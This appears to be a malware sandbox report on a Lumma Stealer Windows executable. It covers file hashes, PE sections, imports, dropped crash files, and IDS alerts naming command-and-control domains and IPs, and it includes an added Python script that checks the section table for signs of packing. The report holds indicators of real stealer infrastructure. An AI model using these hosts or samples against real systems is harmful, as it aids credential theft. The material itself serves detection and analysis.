                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0270538019831088
Encrypted: false
SSDEEP: 192:CZGcZgcPPk0X8TuZiVmju3mhSuiFeH4IO8T4u:YGcZgcPHsaZiVmj/SuiFeH4IO8T4u
MD5: 88B40C9DA6D8678EE98E47512E6F76FA
SHA1: F23B26F5DB31AC31D6861C736DD6ABD09B2AE474
SHA-256: 48C45DCEB4CE908BE1217A12A32BFEAF027CC7EF6A9A7A899F09AEE6ED559C01
SHA-512: F4A5CA06FCD86CF5E00CCBA735393426F106EC79F8B9DFB326E41E1C3D74F63AB4A0A1DE95DBCA73C0312264846FD7BA6F6B32AED8B29A5D5C7AC3F79EBACEF2
Malicious: true
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Fri Jan 10 10:36:20 2025, 0x1205a4 type
Category: dropped
Size (bytes): 49974
Entropy (8bit): 2.563927749152585
Encrypted: false
SSDEEP: 192:2LBcBQCXZ7OruDQ6+qOx1BT2udXFyCl49XgV6IOJ+hWZJ7k6A2+dQWYf:WyDOqDA1TBT2udXFp8ISn79x+nYf
MD5: 88B898372C66D8805A2C9341585F27B3
SHA1: 46D70AC8ABD8CD4FF60FFDB405DDCD8EEA9D1957
SHA-256: 1CC8CB9C9814BDD2764AEB806C0096360AB802BCBD5C9D508F82C6390438CEAF
SHA-512: 6C451F1FAB85885D5AAE55B6E9957A619B375201138249444F3B58C126820F1545B9DE1E53221054526C5EA036C91113F89032C29761FA5A6C4349CD74EF0DBD
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8356
Entropy (8bit): 3.69682604097452
Encrypted: false
SSDEEP: 192:R6l79RJ7t86Im6YwxSU9QQgmfBucFlpDM89bJDsfJDm:R6lXJ7G6Im6YmSU9QQgmfBusJJofg
MD5: A8651BF3FBE28F75AD64496F9095E72D
SHA1: 05BE662D59EF8FA0C454EE93559FC0C4C2DD3B5C
SHA-256: 58658AE58528FBABE803C6FE671076016F7FDABE8E8AC9F3673A20D8E15785CC
SHA-512: 9A4086A5CB6741DDFB48EF7B55FF0286542D40C1D0D8E73C3A3A6956A3390399738F8040B146FE68FEA59DADE76CE641B08B2ADC0B21C8390BD3CFECF881355D
Malicious: false
Reputation: low
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.2.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4616
                                                                                                                                                                                                            Entropy (8bit):4.482359680873746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwr7SGl8zsyJgkZ7aI9L4WpW8VYHYm8M4JZy+HNOqFaOR+q8GfINOFrOmrxfUU:uIafAh7Vx7VzJZyueORJkSrOmhUgU2d
                                                                                                                                                                                                            MD5:3289C1291727C1037D10819D424A7CE3
                                                                                                                                                                                                            SHA1:BAF76B77E5E7DAA713AD85F7B8192B5D25AFCE8F
                                                                                                                                                                                                            SHA-256:A707B08C8AE7A17F1EADCBAD5C26300DA5C6BB32B287610D0E5323C99A8AE1AB
                                                                                                                                                                                                            SHA-512:DD645C3EC78BAC4BE77F6280B67AF16EE155D384A24F4ED0324AD7E92CB89799971F0A8DF473C009A157073F527F60F15B700DA00D33A3E60050EB8B73DB120E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="223013488" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                            Entropy (8bit):4.327137582512804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:URJufhX4RxLT+yMH4A0WBIIQfTa765q/E5ySvL+ML61EhcRo5d5OWiBe8:YJq3BIdBvL+SrcIdYFt
                                                                                                                                                                                                            MD5:B8D22F12ABCD6D26428B4CB51240BC09
                                                                                                                                                                                                            SHA1:14DAC485AEB64CD2D8195CD908E423F04E35B853
                                                                                                                                                                                                            SHA-256:188BB93D34443144E210F3EC7F60B929FB0FB3A185B0AD1F715BFD8D80F02F4A
                                                                                                                                                                                                            SHA-512:F53EA04AB99220BF7E4EBEA7D203B19D3E89AF9D30E58451A2BD44C66AD9A8EDBA72B95DE7F4C8AE9D133A904FABAFD3F816C75C99531A2B2A6AE81D1E5405F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:regfO...O....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..|Kc..............................................................................................................................................................................................................................................................................................................................................;s.H........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.622180953252602
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:filename.exe
                                                                                                                                                                                                            File size:392'192 bytes
                                                                                                                                                                                                            MD5:b826127052f19e148f3a0cbe6f33b59c
                                                                                                                                                                                                            SHA1:9a584be1e8949c627377bccbcb47bbd98f377d92
                                                                                                                                                                                                            SHA256:3741c4663479ad4cbc2159dc4c66ff0fef9290ba58da07c33eb4b87b54cdc81d
                                                                                                                                                                                                            SHA512:154b6542b604c5926c1482b263af7fdb5030e93b04d42feec694f3b4d58b84df804f4d4feadf698a06a22851cf31e7eccd7378315795408f9f4c34a04a01c69d
                                                                                                                                                                                                            SSDEEP:6144:/w/AGkvhnnH8mAvB4gwP1BEPAaNw9+JAnQM4LGPXvd:/NGkJnnHH64v1BEP/w9+JI4ifv
                                                                                                                                                                                                            TLSH:0584BFD1B6B1A428E7B787360D35EBA49B3FB822ED34528ED224365F1D7D2918532703
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G.'.&.t.&.t.&.t0i2t.&.t.t t.&.t.t1t.&.t.t't.&.t...t.&.t.&.t.&.t.t.t.&.t.t0t.&.t.t5t.&.tRich.&.t................PE..L...}..e...
                                                                                                                                                                                                            Icon Hash:b2da5868a0424403
                                                                                                                                                                                                            Entrypoint:0x4019e6
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x65908D7D [Sat Dec 30 21:37:01 2023 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:aea4674a59a95461268ac957ceebb2d3
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            call 00007FA96C80805Eh
                                                                                                                                                                                                            jmp 00007FA96C80440Dh
                                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            sub esp, 00000328h
                                                                                                                                                                                                            mov dword ptr [00447C50h], eax
                                                                                                                                                                                                            mov dword ptr [00447C4Ch], ecx
                                                                                                                                                                                                            mov dword ptr [00447C48h], edx
                                                                                                                                                                                                            mov dword ptr [00447C44h], ebx
                                                                                                                                                                                                            mov dword ptr [00447C40h], esi
                                                                                                                                                                                                            mov dword ptr [00447C3Ch], edi
                                                                                                                                                                                                            mov word ptr [00447C68h], ss
                                                                                                                                                                                                            mov word ptr [00447C5Ch], cs
                                                                                                                                                                                                            mov word ptr [00447C38h], ds
                                                                                                                                                                                                            mov word ptr [00447C34h], es
                                                                                                                                                                                                            mov word ptr [00447C30h], fs
                                                                                                                                                                                                            mov word ptr [00447C2Ch], gs
                                                                                                                                                                                                            pushfd
                                                                                                                                                                                                            pop dword ptr [00447C60h]
                                                                                                                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                            mov dword ptr [00447C54h], eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                            mov dword ptr [00447C58h], eax
                                                                                                                                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            mov dword ptr [00447C64h], eax
                                                                                                                                                                                                            mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                            mov dword ptr [00447BA0h], 00010001h
                                                                                                                                                                                                            mov eax, dword ptr [00447C58h]
                                                                                                                                                                                                            mov dword ptr [00447B54h], eax
                                                                                                                                                                                                            mov dword ptr [00447B48h], C0000409h
                                                                                                                                                                                                            mov dword ptr [00447B4Ch], 00000001h
                                                                                                                                                                                                            mov eax, dword ptr [00445008h]
                                                                                                                                                                                                            mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                            mov eax, dword ptr [0044500Ch]
                                                                                                                                                                                                            mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                            call dword ptr [000000DCh]
                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                                            • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4389c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x423000 | 0x15a38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x42000 | 0x1a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4068c | 0x40800 | 74aa428faaf56442f08207e15c364fa6 | False | 0.807151617005814 | data | 7.3851056058800415 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x42000 | 0x2228 | 0x2400 | fd6e74d0a9cda351aa1b3982f74f813c | False | 0.3514539930555556 | data | 5.3996639236398805 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x45000 | 0x3dd118 | 0x7000 | d3f71c63bad94dd0a0a0fa4046e676a7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x423000 | 0x15a38 | 0x15c00 | 4ac192ec0679b67a4ba875f41ff9ab37 | False | 0.4552015984195402 | data | 4.930456729782306 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
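Two things in this section table are worth checking by hand when a report carries the "Detected unpacking" signatures: .text has an entropy of 7.39 (executable bytes close to random, which is what encrypted or compressed code looks like) and .data maps 0x3dd118 bytes in memory while only 0x7000 bytes are present in the file, leaving a large zero-filled region a stub can unpack into. The script below is an added example, not part of the Joe Sandbox report or its tooling. It transcribes the four rows above into literals (the report gives .data's entropy as "unknown", kept as None), applies two rule-of-thumb thresholds that are assumptions (HIGH_ENTROPY, SLACK_RATIO), and reproduces the RVA-to-section lookup that attributes the IAT directory at 0x42000 to .rdata in the data directory table.

```python
"""Packing heuristics over a PE section table.

Added example, not Joe Sandbox code. REPORT_SECTIONS is the section table
from the report transcribed into literals; the thresholds are assumptions.
"""
from dataclasses import dataclass
from typing import Optional

SCN_EXEC = "IMAGE_SCN_MEM_EXECUTE"
SCN_WRITE = "IMAGE_SCN_MEM_WRITE"
HIGH_ENTROPY = 7.0   # assumed cut-off; 8.0 is the maximum for a byte stream
SLACK_RATIO = 4      # assumed cut-off for VirtualSize / RawSize


@dataclass(frozen=True)
class Section:
    name: str
    vaddr: int               # RVA where the loader maps the section
    vsize: int               # bytes mapped in memory
    rawsize: int             # bytes actually stored in the file
    entropy: Optional[float]
    flags: frozenset


def section(name, vaddr, vsize, rawsize, entropy, characteristics):
    flags = frozenset(f.strip() for f in characteristics.split(","))
    return Section(name, vaddr, vsize, rawsize, entropy, flags)


# Constructed from the report's section table; .data entropy is "unknown" there.
REPORT_SECTIONS = [
    section(".text", 0x1000, 0x4068c, 0x40800, 7.3851056058800415,
            "IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ"),
    section(".rdata", 0x42000, 0x2228, 0x2400, 5.3996639236398805,
            "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    section(".data", 0x45000, 0x3dd118, 0x7000, None,
            "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    section(".rsrc", 0x423000, 0x15a38, 0x15c00, 4.930456729782306,
            "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
]


def section_for_rva(sections, rva):
    """Name of the section whose mapped range contains rva, or None.

    This is the lookup behind the data directory table's ".rdata" column:
    the directory RVA is matched against each section's in-memory span.
    """
    for s in sections:
        if s.vaddr <= rva < s.vaddr + max(s.vsize, s.rawsize):
            return s.name
    return None


def packing_indicators(sections):
    """Map section name -> reasons it looks packed or used as an unpack target."""
    findings = {}
    for s in sections:
        reasons = []
        if s.entropy is not None and s.entropy >= HIGH_ENTROPY and SCN_EXEC in s.flags:
            reasons.append(f"executable section with entropy {s.entropy:.2f}")
        if s.rawsize and s.vsize // s.rawsize >= SLACK_RATIO:
            # The loader zero-fills the vsize - rawsize bytes that are not in the
            # file, so a stub can decrypt a payload there without touching the file.
            reasons.append(
                f"virtual size {s.vsize:#x} is {s.vsize // s.rawsize}x raw size {s.rawsize:#x}")
        if SCN_WRITE in s.flags and SCN_EXEC in s.flags:
            reasons.append("writable and executable")
        if reasons:
            findings[s.name] = reasons
    return findings


if __name__ == "__main__":
    print("IAT directory 0x42000 lives in", section_for_rva(REPORT_SECTIONS, 0x42000))
    for name, reasons in packing_indicators(REPORT_SECTIONS).items():
        print(name, "->", "; ".join(reasons))
```

On this sample the two flagged sections are .text (entropy) and .data (virtual size about 141 times the raw size); .rdata and .rsrc pass. Against a real file the same checks can be fed from pefile's section objects, but the rows above are enough to see why the sandbox called the sample packed.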
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x423760 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.5063965884861408
RT_ICON | 0x424608 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.5640794223826715
RT_ICON | 0x424eb0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.5835253456221198
RT_ICON | 0x425578 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.6163294797687862
RT_ICON | 0x425ae0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.39398340248962654
RT_ICON | 0x428088 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.4580206378986867
RT_ICON | 0x429130 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | | | 0.45901639344262296
RT_ICON | 0x429ab8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.5585106382978723
RT_ICON | 0x429f98 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3451492537313433
RT_ICON | 0x42ae40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.4778880866425993
RT_ICON | 0x42b6e8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.5518433179723502
RT_ICON | 0x42bdb0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5939306358381503
RT_ICON | 0x42c318 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.32668855534709196
RT_ICON | 0x42d3c0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.32704918032786884
RT_ICON | 0x42dd48 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.37677304964539005
RT_ICON | 0x42e218 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.232409381663113
RT_ICON | 0x42f0c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.28474729241877256
RT_ICON | 0x42f968 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.4078341013824885
RT_ICON | 0x430030 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.32153179190751446
RT_ICON | 0x430598 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.5774896265560165
RT_ICON | 0x432b40 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.6374296435272045
RT_ICON | 0x433be8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | | | 0.6741803278688525
RT_ICON | 0x434570 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7641843971631206
RT_STRING | 0x434c08 | 0x40a | data | | | 0.4584139264990329
RT_STRING | 0x435018 | 0x9c | data | | | 0.6217948717948718
RT_STRING | 0x4350b8 | 0x79c | data | | | 0.4209445585215606
RT_STRING | 0x435858 | 0x53a | data | | | 0.4514200298953662
RT_STRING | 0x435d98 | 0x772 | data | | | 0.4218258132214061
RT_STRING | 0x436510 | 0x7f6 | data | | | 0.41952894995093226
RT_STRING | 0x436d08 | 0x7a8 | data | | | 0.42244897959183675
RT_STRING | 0x4374b0 | 0x784 | data | | | 0.420997920997921
RT_STRING | 0x437c38 | 0x6f2 | data | | | 0.43250843644544434
RT_STRING | 0x438330 | 0x708 | data | | | 0.4261111111111111
RT_GROUP_ICON | 0x4349d8 | 0x76 | data | | | 0.6694915254237288
RT_GROUP_ICON | 0x42e1b0 | 0x68 | data | | | 0.7115384615384616
RT_GROUP_ICON | 0x429f20 | 0x76 | data | | | 0.6610169491525424
RT_VERSION | 0x434a50 | 0x1b4 | data | | | 0.5711009174311926
DLL | Import
KERNEL32.dll | GetCommandLineW, PulseEvent, SetDefaultCommConfigA, WriteConsoleOutputW, SetUnhandledExceptionFilter, EndUpdateResourceW, InterlockedDecrement, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetVersionExW, DeleteVolumeMountPointW, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, DisconnectNamedPipe, SetLastError, GetProcAddress, SearchPathA, SetFileAttributesA, GetNumaHighestNodeNumber, OpenWaitableTimerA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, BuildCommDCBA, WriteConsoleOutputAttribute, GetShortPathNameW, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, MultiByteToWideChar, GetLastError, HeapReAlloc, HeapAlloc, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
USER32.dll | GetClassLongW
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T11:36:09.495762+0100 | 2058608 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) | 1 | 192.168.2.3 | 56184 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.581828+0100 | 2058514 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) | 1 | 192.168.2.3 | 50072 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.594358+0100 | 2058502 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) | 1 | 192.168.2.3 | 56386 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.605984+0100 | 2058492 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) | 1 | 192.168.2.3 | 60721 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.620029+0100 | 2058500 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) | 1 | 192.168.2.3 | 50960 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.630241+0100 | 2058510 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) | 1 | 192.168.2.3 | 63788 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.644088+0100 | 2058484 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) | 1 | 192.168.2.3 | 62975 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.658299+0100 | 2058512 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) | 1 | 192.168.2.3 | 57859 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.669950+0100 | 2058480 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) | 1 | 192.168.2.3 | 50835 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:10.352691+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | TCP
2025-01-10T11:36:10.823273+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | TCP
2025-01-10T11:36:11.568040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.005133+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.005133+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.519064+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49762 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.976226+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.3 | 49762 | 104.21.48.1 | 443 | TCP
